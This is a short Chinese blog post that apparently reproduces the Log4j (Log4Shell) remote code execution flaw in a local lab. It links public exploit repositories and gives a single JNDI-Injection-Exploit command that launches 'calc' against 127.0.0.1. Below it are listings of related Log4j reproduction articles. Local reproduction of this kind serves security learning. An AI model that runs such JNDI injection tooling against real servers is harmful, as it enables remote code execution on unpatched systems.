log4本地简单复现

最新推荐文章于 2023-09-26 15:21:18 发布
最新推荐文章于 2023-09-26 15:21:18 发布
阅读量298 收藏
点赞数
分类专栏: 漏洞复现 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44281516/article/details/122260277
版权
本文介绍了如何通过下载Log4j-exp和JNDI-Injection-Exploit,使用java-jar命令进行环境配置,展示了如何利用此漏洞在'calc'服务上执行命令。操作涉及Java安全漏洞和JNDI注入技术。
摘要由CSDN通过智能技术生成

先下载环境
https://github.com/Yihsiwei/Log4j-exp
https://github.com/welk1n/JNDI-Injection-Exploit
cmd运行
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “calc” -A “127.0.0.1”
在这里插入图片描述
运行
在这里插入图片描述
结束。

LJ会发光
关注
专栏目录
Android 本地日志记录
04-25
本文将深入探讨如何实现Android本地日志记录,包括自动记录崩溃信息、设备信息,以及手动添加Log信息,并讲解如何设置日志保存策略。 首先,自动记录崩溃信息是确保应用稳定性和可靠性的重要步骤。当应用遇到未捕获...
〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测
K8哥哥
12-18 4735
title: 〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测 comments: true toc: true categories: exp tags: Log4j2 abbrlink: log4shell date: 2021-12-16 19:24:00 img: https://img-blog.csdnimg.cn/20210117163103552.jpg 漏洞简介 Apache Log4j2是一款优秀的Java日志框架。近日,漏洞银行安全团队注意到了Ap.
log4j漏洞搭建及其复现
m0_65150886的博客
09-26 270
vulhub是一个开源漏洞靶场,可以在安装和docker-compose 后,使用简单的指令搭建漏洞环境。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 4761
Log4j2 RCE漏洞原理与复现
log4j漏洞原理分析&复现&检测&复盘
qq_43665434的博客
08-22 3013
log4j漏洞原理分析&复现&检测&复盘
Log4j漏洞复现
m1287578441的博客
06-08 2982
Log4j漏洞复现
本地HTTPS环境搭建的完整步骤记录
01-20
前言 之前在为公司的应用添加 https 时,是在 nginx 上配置的,这样不需要 node 做额外的开发,但是组内的开发同学本地一直...本地开发的证书可以自己生成一个,可以通过以下步骤生成一个简单的证书: 首先,进入你想
使用蓝牙抓取log的方法
06-28
2. **使用ADB Pull命令**:更常见的做法是使用`adb pull`命令将log文件从设备拉取到本地计算机。命令格式为: ``` adb pull sdcard/hcidumplog.txt [本地保存路径] ``` 例如,如果你想将log文件保存到当前ADB...
应用笔记LAT1339+AFCI应用笔记三、使用mlflow管理模型
最新发布
04-05
- **自动日志记录 (Autolog)**:这是最简单快捷的方式,只需调用`mlflow.autolog()`函数,即可自动记录指定框架(如scikit-learn、Keras、PyTorch等)的相关信息。 - **手动日志记录**:对于不支持自动日志记录的...
python+adb+monkey实现Rom稳定性测试详解
12-20
因此,接手这项工作的目标是复现这些问题,并提供详细的log和数据供开发团队分析。主要关注的特性是开发在Framework层增加的应用权限管控,包括基础权限、自动权限以及AIDL接口。此外,服务端能够控制手机上APP的...
Log4J漏洞本地快速复现
crowsec
12-20 3411
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01.参 考 资 料 本复现大量参考: https://github.com/Yihsiwei/Log4j-exp 本次复现仅仅帮助他人本地复现漏洞。 在网上已经有很多人复现漏洞,但是对于不会java的童鞋,又想研究后续命令执行上线的童鞋来说,无疑是非常困难的,于是对比了几个版本之后,在这里对于本地漏洞复现做一个文字记录。 请大家严格遵守《漏洞管理条例》和《网络安全法》 02.本地复现步骤 复现环境:wind...
Log4j2远程代码执行漏洞本地复现
CleanMe的博客
12-12 5436
Log4j2远程代码执行漏洞本地复现
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 3323
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
Log4j漏洞环境搭建以及复现拿getshell
qq_40898302的博客
04-29 2163
环境搭建 为了实验效果,准备两台设备 kali:10.1.1.17 Windows本机:10.1.1.240 kali虚拟机安装docker环境和vulhub环境 安装方法详情:​​​​​​Vulhub - Docker-Compose file for vulnerability environment 启动docker 进入vulhub/log4j/CVE-2021-44228 启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右) docker-compose u
Log4j2 RCE 简单复现
ChamZhiZe的博客
01-10 702
一:所以环境 java 1.8.0_u172+idea 注:高版本的java不行,最好是在java1.8.0_u140以前的版本复现。 二:复现过程 github上下载本次复现所需要的东西: 第一步 你需要知道你的IP地址,因为是本地复现,所以就是你本地的物理机IP,也可以是你服务器的IP地址,总之一定是自己的IP地址。你要是做一些坏事儿,铁手镯会带到你的手腕上,请你到里面喝喝茶。 第二步 开启你的LDAP服务,在文件加的POC文件夹下,通过cmd启动你的LDAP服务 java -jar JNDIExp
Log4j复现过程
weixin_50339832的博客
12-26 2430
log4j是一个记录日志的组件,用来对程序状态进行动态记录, logger.info("system propety: ${jndi:schema://url}"); jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi, 并打印,jndi就是这个从外部查找得到的java对象。 schema:获取方式,jdk支持多种不同的查找方式,包括 corbname, dns, iiop, iiopname, ldap, ldaps, rmi 因ldap写法简单,被作为常用的获取方式
Log4j核弹级bug复现及解决方案
wangdakaiwandashuai的博客
12-14 1617
Log4j核弹级bug
log4j漏洞复现
weixin_45740473的博客
12-23 9234
12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。 Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。 一、lookup 功能造成的漏洞 Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过
记录一次log4j复现之旅(复现不了你来找我)
lmboss的博客
04-02 6586
log4j超完美复现!记录一次log4j复现之旅
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值